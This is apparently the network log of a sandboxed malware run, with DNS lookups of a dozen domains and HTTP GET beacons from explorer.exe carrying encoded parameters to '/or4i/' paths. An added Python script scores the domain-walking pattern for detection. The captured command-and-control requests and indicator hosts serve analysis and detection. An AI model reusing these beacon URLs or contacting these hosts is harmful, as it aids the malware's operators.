May 12, 2021 07:35:01.868086100 CEST | 60985 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:35:01.925163031 CEST | 53 | 60985 | 8.8.8.8 | 192.168.2.3
May 12, 2021 07:35:02.001374960 CEST | 50200 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:35:02.094660044 CEST | 53 | 50200 | 8.8.8.8 | 192.168.2.3
May 12, 2021 07:35:02.440005064 CEST | 51281 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:35:02.493030071 CEST | 53 | 51281 | 8.8.8.8 | 192.168.2.3
May 12, 2021 07:35:03.339555025 CEST | 49199 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:35:03.389594078 CEST | 53 | 49199 | 8.8.8.8 | 192.168.2.3
May 12, 2021 07:35:04.433197021 CEST | 50620 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:35:04.484838009 CEST | 53 | 50620 | 8.8.8.8 | 192.168.2.3
May 12, 2021 07:35:04.533371925 CEST | 64938 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:35:04.591986895 CEST | 53 | 64938 | 8.8.8.8 | 192.168.2.3
May 12, 2021 07:35:05.743690968 CEST | 60152 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:35:05.792412996 CEST | 53 | 60152 | 8.8.8.8 | 192.168.2.3
May 12, 2021 07:35:06.714699030 CEST | 57544 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:35:06.766304970 CEST | 53 | 57544 | 8.8.8.8 | 192.168.2.3
May 12, 2021 07:35:07.906347036 CEST | 55984 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:35:07.957951069 CEST | 53 | 55984 | 8.8.8.8 | 192.168.2.3
May 12, 2021 07:35:08.944035053 CEST | 64185 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:35:09.001530886 CEST | 53 | 64185 | 8.8.8.8 | 192.168.2.3
May 12, 2021 07:35:10.192361116 CEST | 65110 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:35:10.241082907 CEST | 53 | 65110 | 8.8.8.8 | 192.168.2.3
May 12, 2021 07:35:12.278356075 CEST | 58361 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:35:12.333632946 CEST | 53 | 58361 | 8.8.8.8 | 192.168.2.3
May 12, 2021 07:35:13.772128105 CEST | 63492 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:35:13.820853949 CEST | 53 | 63492 | 8.8.8.8 | 192.168.2.3
May 12, 2021 07:35:15.912441015 CEST | 60831 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:35:15.964009047 CEST | 53 | 60831 | 8.8.8.8 | 192.168.2.3
May 12, 2021 07:35:17.162112951 CEST | 60100 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:35:17.213691950 CEST | 53 | 60100 | 8.8.8.8 | 192.168.2.3
May 12, 2021 07:35:18.284503937 CEST | 53195 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:35:18.336117029 CEST | 53 | 53195 | 8.8.8.8 | 192.168.2.3
May 12, 2021 07:35:19.086713076 CEST | 50141 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:35:19.135622025 CEST | 53 | 50141 | 8.8.8.8 | 192.168.2.3
May 12, 2021 07:35:24.923013926 CEST | 53023 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:35:24.973144054 CEST | 53 | 53023 | 8.8.8.8 | 192.168.2.3
May 12, 2021 07:35:26.943756104 CEST | 49563 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:35:26.992523909 CEST | 53 | 49563 | 8.8.8.8 | 192.168.2.3
May 12, 2021 07:35:28.041414976 CEST | 51352 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:35:28.090158939 CEST | 53 | 51352 | 8.8.8.8 | 192.168.2.3
May 12, 2021 07:35:28.881341934 CEST | 59349 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:35:28.932116985 CEST | 53 | 59349 | 8.8.8.8 | 192.168.2.3
May 12, 2021 07:35:30.398412943 CEST | 57084 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:35:30.447227001 CEST | 53 | 57084 | 8.8.8.8 | 192.168.2.3
May 12, 2021 07:35:36.635267019 CEST | 58823 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:35:36.697545052 CEST | 53 | 58823 | 8.8.8.8 | 192.168.2.3
May 12, 2021 07:35:49.593894005 CEST | 57568 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:35:49.666579008 CEST | 53 | 57568 | 8.8.8.8 | 192.168.2.3
May 12, 2021 07:35:57.115423918 CEST | 50540 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:35:57.172544003 CEST | 53 | 50540 | 8.8.8.8 | 192.168.2.3
May 12, 2021 07:36:15.867855072 CEST | 54366 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:36:16.878719091 CEST | 54366 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:36:17.926945925 CEST | 54366 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:36:19.941365004 CEST | 53 | 54366 | 8.8.8.8 | 192.168.2.3
May 12, 2021 07:36:20.953538895 CEST | 53 | 54366 | 8.8.8.8 | 192.168.2.3
May 12, 2021 07:36:21.998647928 CEST | 53 | 54366 | 8.8.8.8 | 192.168.2.3
May 12, 2021 07:36:22.044761896 CEST | 53034 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:36:22.105000973 CEST | 53 | 53034 | 8.8.8.8 | 192.168.2.3
May 12, 2021 07:36:24.963274956 CEST | 57762 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:36:25.373923063 CEST | 53 | 57762 | 8.8.8.8 | 192.168.2.3
May 12, 2021 07:36:30.845324039 CEST | 55435 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:36:31.245966911 CEST | 50713 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:36:31.304512978 CEST | 53 | 50713 | 8.8.8.8 | 192.168.2.3
May 12, 2021 07:36:31.456475019 CEST | 53 | 55435 | 8.8.8.8 | 192.168.2.3
May 12, 2021 07:36:37.451916933 CEST | 56132 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:36:37.514128923 CEST | 53 | 56132 | 8.8.8.8 | 192.168.2.3
May 12, 2021 07:36:40.688345909 CEST | 58987 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:36:40.745456934 CEST | 53 | 58987 | 8.8.8.8 | 192.168.2.3
May 12, 2021 07:36:42.629811049 CEST | 56579 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:36:42.784970045 CEST | 53 | 56579 | 8.8.8.8 | 192.168.2.3
May 12, 2021 07:36:47.814141989 CEST | 60633 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:36:47.875988960 CEST | 53 | 60633 | 8.8.8.8 | 192.168.2.3
May 12, 2021 07:36:52.997044086 CEST | 61292 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:36:53.064209938 CEST | 53 | 61292 | 8.8.8.8 | 192.168.2.3
May 12, 2021 07:36:58.871206999 CEST | 63619 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:36:58.940164089 CEST | 53 | 63619 | 8.8.8.8 | 192.168.2.3
May 12, 2021 07:37:01.478374004 CEST | 64938 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:37:01.527139902 CEST | 53 | 64938 | 8.8.8.8 | 192.168.2.3
May 12, 2021 07:37:03.962233067 CEST | 61946 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:37:04.019355059 CEST | 53 | 61946 | 8.8.8.8 | 192.168.2.3
May 12, 2021 07:37:04.112806082 CEST | 64910 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:37:04.174323082 CEST | 53 | 64910 | 8.8.8.8 | 192.168.2.3
May 12, 2021 07:37:09.665203094 CEST | 52123 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:37:09.728729963 CEST | 53 | 52123 | 8.8.8.8 | 192.168.2.3
May 12, 2021 07:37:14.744381905 CEST | 56130 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:37:14.937685966 CEST | 53 | 56130 | 8.8.8.8 | 192.168.2.3
May 12, 2021 07:37:20.276674986 CEST | 56338 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:37:21.290323019 CEST | 56338 | 53 | 192.168.2.3 | 8.8.8.8
May 12, 2021 07:37:22.305836916 CEST | 56338 | 53 | 192.168.2.3 | 8.8.8.8

ICMP Packets

Timestamp | Source IP | Dest IP | Checksum | Code | Type
May 12, 2021 07:36:20.954955101 CEST | 192.168.2.3 | 8.8.8.8 | cff3 | (Port unreachable) | Destination Unreachable
May 12, 2021 07:36:21.998903036 CEST | 192.168.2.3 | 8.8.8.8 | cff3 | (Port unreachable) | Destination Unreachable

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 12, 2021 07:36:15.867855072 CEST | 192.168.2.3 | 8.8.8.8 | 0xbfe0 | Standard query (0) | www.aqayeseo.com | A (IP address) | IN (0x0001)
May 12, 2021 07:36:16.878719091 CEST | 192.168.2.3 | 8.8.8.8 | 0xbfe0 | Standard query (0) | www.aqayeseo.com | A (IP address) | IN (0x0001)
May 12, 2021 07:36:17.926945925 CEST | 192.168.2.3 | 8.8.8.8 | 0xbfe0 | Standard query (0) | www.aqayeseo.com | A (IP address) | IN (0x0001)
May 12, 2021 07:36:24.963274956 CEST | 192.168.2.3 | 8.8.8.8 | 0x6b2d | Standard query (0) | www.king-jackpot.com | A (IP address) | IN (0x0001)
May 12, 2021 07:36:30.845324039 CEST | 192.168.2.3 | 8.8.8.8 | 0x2265 | Standard query (0) | www.0o-a-8v4l76.net | A (IP address) | IN (0x0001)
May 12, 2021 07:36:37.451916933 CEST | 192.168.2.3 | 8.8.8.8 | 0xfb14 | Standard query (0) | www.downtoearthwork.com | A (IP address) | IN (0x0001)
May 12, 2021 07:36:42.629811049 CEST | 192.168.2.3 | 8.8.8.8 | 0x2a0d | Standard query (0) | www.smartmatch-dating-api.com | A (IP address) | IN (0x0001)
May 12, 2021 07:36:47.814141989 CEST | 192.168.2.3 | 8.8.8.8 | 0xad70 | Standard query (0) | www.topcasino-111.com | A (IP address) | IN (0x0001)
May 12, 2021 07:36:52.997044086 CEST | 192.168.2.3 | 8.8.8.8 | 0xd165 | Standard query (0) | www.shebagholdings.com | A (IP address) | IN (0x0001)
May 12, 2021 07:36:58.871206999 CEST | 192.168.2.3 | 8.8.8.8 | 0xaaaa | Standard query (0) | www.booweats.com | A (IP address) | IN (0x0001)
May 12, 2021 07:37:04.112806082 CEST | 192.168.2.3 | 8.8.8.8 | 0x4ec2 | Standard query (0) | www.xn--espacesacr-k7a.com | A (IP address) | IN (0x0001)
May 12, 2021 07:37:09.665203094 CEST | 192.168.2.3 | 8.8.8.8 | 0x451d | Standard query (0) | www.lingoblasterdiscount.com | A (IP address) | IN (0x0001)
May 12, 2021 07:37:14.744381905 CEST | 192.168.2.3 | 8.8.8.8 | 0xe832 | Standard query (0) | www.painteredmond.com | A (IP address) | IN (0x0001)
May 12, 2021 07:37:20.276674986 CEST | 192.168.2.3 | 8.8.8.8 | 0x8d20 | Standard query (0) | www.cylindberg.com | A (IP address) | IN (0x0001)
May 12, 2021 07:37:21.290323019 CEST | 192.168.2.3 | 8.8.8.8 | 0x8d20 | Standard query (0) | www.cylindberg.com | A (IP address) | IN (0x0001)
May 12, 2021 07:37:22.305836916 CEST | 192.168.2.3 | 8.8.8.8 | 0x8d20 | Standard query (0) | www.cylindberg.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 12, 2021 07:36:19.941365004 CEST | 8.8.8.8 | 192.168.2.3 | 0xbfe0 | Server failure (2) | www.aqayeseo.com | none | none | A (IP address) | IN (0x0001)
May 12, 2021 07:36:20.953538895 CEST | 8.8.8.8 | 192.168.2.3 | 0xbfe0 | Server failure (2) | www.aqayeseo.com | none | none | A (IP address) | IN (0x0001)
May 12, 2021 07:36:21.998647928 CEST | 8.8.8.8 | 192.168.2.3 | 0xbfe0 | Server failure (2) | www.aqayeseo.com | none | none | A (IP address) | IN (0x0001)
May 12, 2021 07:36:25.373923063 CEST | 8.8.8.8 | 192.168.2.3 | 0x6b2d | No error (0) | www.king-jackpot.com | king-jackpot.com | | CNAME (Canonical name) | IN (0x0001)
May 12, 2021 07:36:25.373923063 CEST | 8.8.8.8 | 192.168.2.3 | 0x6b2d | No error (0) | king-jackpot.com | | 119.18.54.126 | A (IP address) | IN (0x0001)
May 12, 2021 07:36:31.456475019 CEST | 8.8.8.8 | 192.168.2.3 | 0x2265 | No error (0) | www.0o-a-8v4l76.net | | 163.43.122.109 | A (IP address) | IN (0x0001)
May 12, 2021 07:36:37.514128923 CEST | 8.8.8.8 | 192.168.2.3 | 0xfb14 | No error (0) | www.downtoearthwork.com | | 104.21.46.55 | A (IP address) | IN (0x0001)
May 12, 2021 07:36:37.514128923 CEST | 8.8.8.8 | 192.168.2.3 | 0xfb14 | No error (0) | www.downtoearthwork.com | | 172.67.223.227 | A (IP address) | IN (0x0001)
May 12, 2021 07:36:42.784970045 CEST | 8.8.8.8 | 192.168.2.3 | 0x2a0d | Server failure (2) | www.smartmatch-dating-api.com | none | none | A (IP address) | IN (0x0001)
May 12, 2021 07:36:47.875988960 CEST | 8.8.8.8 | 192.168.2.3 | 0xad70 | No error (0) | www.topcasino-111.com | | 87.98.148.38 | A (IP address) | IN (0x0001)
May 12, 2021 07:36:53.064209938 CEST | 8.8.8.8 | 192.168.2.3 | 0xd165 | No error (0) | www.shebagholdings.com | | 154.84.101.247 | A (IP address) | IN (0x0001)
May 12, 2021 07:36:58.940164089 CEST | 8.8.8.8 | 192.168.2.3 | 0xaaaa | No error (0) | www.booweats.com | | 64.190.62.111 | A (IP address) | IN (0x0001)
May 12, 2021 07:37:04.174323082 CEST | 8.8.8.8 | 192.168.2.3 | 0x4ec2 | No error (0) | www.xn--espacesacr-k7a.com | xn--espacesacr-k7a.com | | CNAME (Canonical name) | IN (0x0001)
May 12, 2021 07:37:04.174323082 CEST | 8.8.8.8 | 192.168.2.3 | 0x4ec2 | No error (0) | xn--espacesacr-k7a.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
May 12, 2021 07:37:09.728729963 CEST | 8.8.8.8 | 192.168.2.3 | 0x451d | Name error (3) | www.lingoblasterdiscount.com | none | none | A (IP address) | IN (0x0001)
May 12, 2021 07:37:14.937685966 CEST | 8.8.8.8 | 192.168.2.3 | 0xe832 | No error (0) | www.painteredmond.com | | 192.185.0.218 | A (IP address) | IN (0x0001)
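The DNS tables above show the sandboxed host looking up a run of unrelated domains at roughly five-second intervals between 07:36:15 and 07:37:22. Four of the twelve names never resolve: www.aqayeseo.com and www.smartmatch-dating-api.com get Server failure, www.lingoblasterdiscount.com gets Name error, and www.cylindberg.com gets no answer at all. The first lookup was sent three times under the same transaction ID 0xbfe0, and the two ICMP Destination Unreachable (Port unreachable) messages from 192.168.2.3 to 8.8.8.8 coincide with the second and third late Server failure replies, which is consistent with the client having already closed the socket it queried from. The Python below is an added example and is not part of the sandbox report: it pairs queries with answers by transaction ID, counts retransmissions and failures, and scores the "walk a list of unrelated domains" pattern. The rows are transcribed from the tables above with timestamps truncated to microseconds; the window and thresholds are assumptions, and the two-label registrable-domain helper is a simplification of the public suffix list.

```python
from collections import Counter, defaultdict
from datetime import datetime

# Transcribed from the DNS Queries and DNS Answers tables above, timestamps truncated
# to microseconds: (time, transaction id, name) per query and (time, transaction id,
# reply code) per answer. Answers that carried a CNAME plus an A record are one entry.
QUERIES = [
    ("07:36:15.867855", 0xbfe0, "www.aqayeseo.com"),
    ("07:36:16.878719", 0xbfe0, "www.aqayeseo.com"),
    ("07:36:17.926945", 0xbfe0, "www.aqayeseo.com"),
    ("07:36:24.963274", 0x6b2d, "www.king-jackpot.com"),
    ("07:36:30.845324", 0x2265, "www.0o-a-8v4l76.net"),
    ("07:36:37.451916", 0xfb14, "www.downtoearthwork.com"),
    ("07:36:42.629811", 0x2a0d, "www.smartmatch-dating-api.com"),
    ("07:36:47.814141", 0xad70, "www.topcasino-111.com"),
    ("07:36:52.997044", 0xd165, "www.shebagholdings.com"),
    ("07:36:58.871206", 0xaaaa, "www.booweats.com"),
    ("07:37:04.112806", 0x4ec2, "www.xn--espacesacr-k7a.com"),
    ("07:37:09.665203", 0x451d, "www.lingoblasterdiscount.com"),
    ("07:37:14.744381", 0xe832, "www.painteredmond.com"),
    ("07:37:20.276674", 0x8d20, "www.cylindberg.com"),
    ("07:37:21.290323", 0x8d20, "www.cylindberg.com"),
    ("07:37:22.305836", 0x8d20, "www.cylindberg.com"),
]
ANSWERS = [  # reply code: 0 = No error, 2 = Server failure, 3 = Name error
    ("07:36:19.941365", 0xbfe0, 2),
    ("07:36:20.953538", 0xbfe0, 2),
    ("07:36:21.998647", 0xbfe0, 2),
    ("07:36:25.373923", 0x6b2d, 0),
    ("07:36:31.456475", 0x2265, 0),
    ("07:36:37.514128", 0xfb14, 0),
    ("07:36:42.784970", 0x2a0d, 2),
    ("07:36:47.875988", 0xad70, 0),
    ("07:36:53.064209", 0xd165, 0),
    ("07:36:58.940164", 0xaaaa, 0),
    ("07:37:04.174323", 0x4ec2, 0),
    ("07:37:09.728729", 0x451d, 3),
    ("07:37:14.937685", 0xe832, 0),
]


def _t(s):
    return datetime.strptime(s, "%H:%M:%S.%f")


def registrable(name):
    """Two-label approximation of the registrable domain (eTLD+1). Enough for the
    .com/.net names here; production code should consult the public suffix list."""
    return ".".join(name.lower().rstrip(".").split(".")[-2:])


def correlate(queries, answers):
    """Pair queries with answers by transaction ID. Returns one record per distinct
    (transaction id, name), ordered by first query time, with how many times the query
    was sent, how many answers arrived and the last reply code (None if never answered)."""
    sent = Counter()
    first_seen = {}
    for ts, txid, name in queries:
        sent[(txid, name)] += 1
        first_seen.setdefault((txid, name), _t(ts))
    replies = defaultdict(list)
    for ts, txid, rcode in answers:
        replies[txid].append((_t(ts), rcode))
    records = []
    for (txid, name), n in sent.items():
        rc = [r for _, r in sorted(replies.get(txid, []))]
        records.append({"txid": txid, "name": name, "sent": n, "answered": len(rc),
                        "rcode": rc[-1] if rc else None,
                        "first_seen": first_seen[(txid, name)]})
    records.sort(key=lambda r: r["first_seen"])
    return records


def domain_walk_score(records, window_s=120, min_domains=8, min_fail_ratio=0.25):
    """Flag one client walking many unrelated domains inside window_s seconds with a
    sizeable share of lookups failing (SERVFAIL, NXDOMAIN or unanswered).
    window_s, min_domains and min_fail_ratio are assumed thresholds."""
    if not records:
        return {"flag": False, "distinct_domains": 0, "failed_domains": [],
                "fail_ratio": 0.0, "retransmitted": []}
    start = records[0]["first_seen"]
    recent = [r for r in records if (r["first_seen"] - start).total_seconds() <= window_s]
    domains = {registrable(r["name"]) for r in recent}
    failed = {registrable(r["name"]) for r in recent if r["rcode"] != 0}
    ratio = len(failed) / len(domains)
    return {"flag": len(domains) >= min_domains and ratio >= min_fail_ratio,
            "distinct_domains": len(domains),
            "failed_domains": sorted(failed),
            "fail_ratio": round(ratio, 2),
            "retransmitted": sorted({r["name"] for r in recent if r["sent"] > 1})}


if __name__ == "__main__":
    recs = correlate(QUERIES, ANSWERS)
    for r in recs:
        print("%-30s txid=0x%04x sent=%d answered=%d rcode=%s" % (
            r["name"], r["txid"], r["sent"], r["answered"], r["rcode"]))
    print(domain_walk_score(recs))
```

On these rows the score reports twelve distinct domains, four of them failed (a third), and two names retransmitted, so the host is flagged. Against passive DNS or Zeek dns.log the same logic keys on the client address plus trans_id and rcode; a benign host rarely resolves this many unrelated second-level domains in a minute with a failure rate this high.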

HTTP Request Dependency Graph

• www.king-jackpot.com
• www.0o-a-8v4l76.net
• www.downtoearthwork.com
• www.topcasino-111.com
• www.shebagholdings.com
• www.booweats.com
• www.xn--espacesacr-k7a.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49727 | 119.18.54.126 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 12, 2021 07:36:25.546082020 CEST | 1537 | OUT | GET /or4i/?iN6=xDS7CyCJ4m7HrOhyeYRIonE7yEohNWwwbSjxvOh7bSQREc8K1tWvWT2hFG1Cb6Pxbdkw&KdTL=a2JxONfH HTTP/1.1
Host: www.king-jackpot.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 12, 2021 07:36:25.815865040 CEST | 1538 | IN | HTTP/1.1 404 Not Found
Date: Wed, 12 May 2021 05:36:25 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, close
Last-Modified: Wed, 24 Feb 2021 17:47:31 GMT
Accept-Ranges: bytes
Content-Length: 583
Vary: Accept-Encoding
Content-Type: text/html
Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 20 7d 20 31 30 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 20 7d 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 5f 73 6b 7a 5f 70 69 64 20 3d 20 22 39 50 4f 42 45 58 38 30 57 22 3b 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 64 6e 2e 6a 73 69 6e 69 74 2e 64 69 72 65 63 74 66 77 64 2e 63 6f 6d 2f 73 6b 2d 6a 73 70 61 72 6b 5f 69 6e 69 74 2e 70 68 70 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 61 64 65 72 22 20 69 64 3d 22 73 6b 2d 6c 6f 61 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49733 | 163.43.122.109 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 12, 2021 07:36:31.764292955 CEST | 1604 | OUT | GET /or4i/?KdTL=a2JxONfH&iN6=/YqV2YobZFGxQDMEPRH3FzX3sp56PIzy9ik5N6g8OdLGQC9Q4dIJ/Xm93vftNToRdJfn HTTP/1.1
Host: www.0o-a-8v4l76.net
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 12, 2021 07:36:32.071120977 CEST | 3396 | IN | HTTP/1.1 302 Found
Date: Wed, 12 May 2021 05:36:31 GMT
Server: Apache/2.2.13 (Unix)
Location: http://www.0o-a-8v4l76.net/notfound?KdTL=a2JxONfH&iN6=/YqV2YobZFGxQDMEPRH3FzX3sp56PIzy9ik5N6g8OdLGQC9Q4dIJ/Xm93vftNToRdJfn
Content-Length: 310
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 30 6f 2d 61 2d 38 76 34 6c 37 36 2e 6e 65 74 2f 6e 6f 74 66 6f 75 6e 64 3f 4b 64 54 4c 3d 61 32 4a 78 4f 4e 66 48 26 61 6d 70 3b 69 4e 36 3d 2f 59 71 56 32 59 6f 62 5a 46 47 78 51 44 4d 45 50 52 48 33 46 7a 58 33 73 70 35 36 50 49 7a 79 39 69 6b 35 4e 36 67 38 4f 64 4c 47 51 43 39 51 34 64 49 4a 2f 58 6d 39 33 76 66 74 4e 54 6f 52 64 4a 66 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.0o-a-8v4l76.net/notfound?KdTL=a2JxONfH&amp;iN6=/YqV2YobZFGxQDMEPRH3FzX3sp56PIzy9ik5N6g8OdLGQC9Q4dIJ/Xm93vftNToRdJfn">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49734 | 104.21.46.55 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 12, 2021 07:36:37.560159922 CEST | 6033 | OUT | GET /or4i/?iN6=vk1T1/Otk3yMmnVlXkpxnnLL8r3GDGLc1I2gV0bP1VjWwuz1bkf/wMDaHcJA224PqQY0&KdTL=a2JxONfH HTTP/1.1
Host: www.downtoearthwork.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 12, 2021 07:36:37.612606049 CEST | 6034 | IN | HTTP/1.1 301 Moved Permanently
Date: Wed, 12 May 2021 05:36:37 GMT
Transfer-Encoding: chunked
Connection: close
Cache-Control: max-age=3600
Expires: Wed, 12 May 2021 06:36:37 GMT
Location: https://www.downtoearthwork.com/or4i/?iN6=vk1T1/Otk3yMmnVlXkpxnnLL8r3GDGLc1I2gV0bP1VjWwuz1bkf/wMDaHcJA224PqQY0&KdTL=a2JxONfH
cf-request-id: 0a00acccd800004ab5f298a000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=9b5R7pfybtDNbbE6APLcEI0zQ%2B0r1%2BiHouUEjdrQNb%2FAv87mbz5sBIgFXrhjRVtjB5a8Mu9%2FZRi%2FJ8yhFczUihSJ4lmHqXk%2FI2DhJrSLLXjUzNP6slncdQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 64e14a5afc2c4ab5-FRA
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.3 | 49736 | 87.98.148.38 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 12, 2021 07:36:47.928524017 CEST | 6068 | OUT | GET /or4i/?iN6=3f8HQQz9URnG4Uu+PIIk9qulCbedODjEyUaPCq0CAbkTamHv8kfsRb46QNyKsrnaM2YM&KdTL=a2JxONfH HTTP/1.1
Host: www.topcasino-111.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 12, 2021 07:36:47.980216980 CEST | 6069 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx/1.19.4
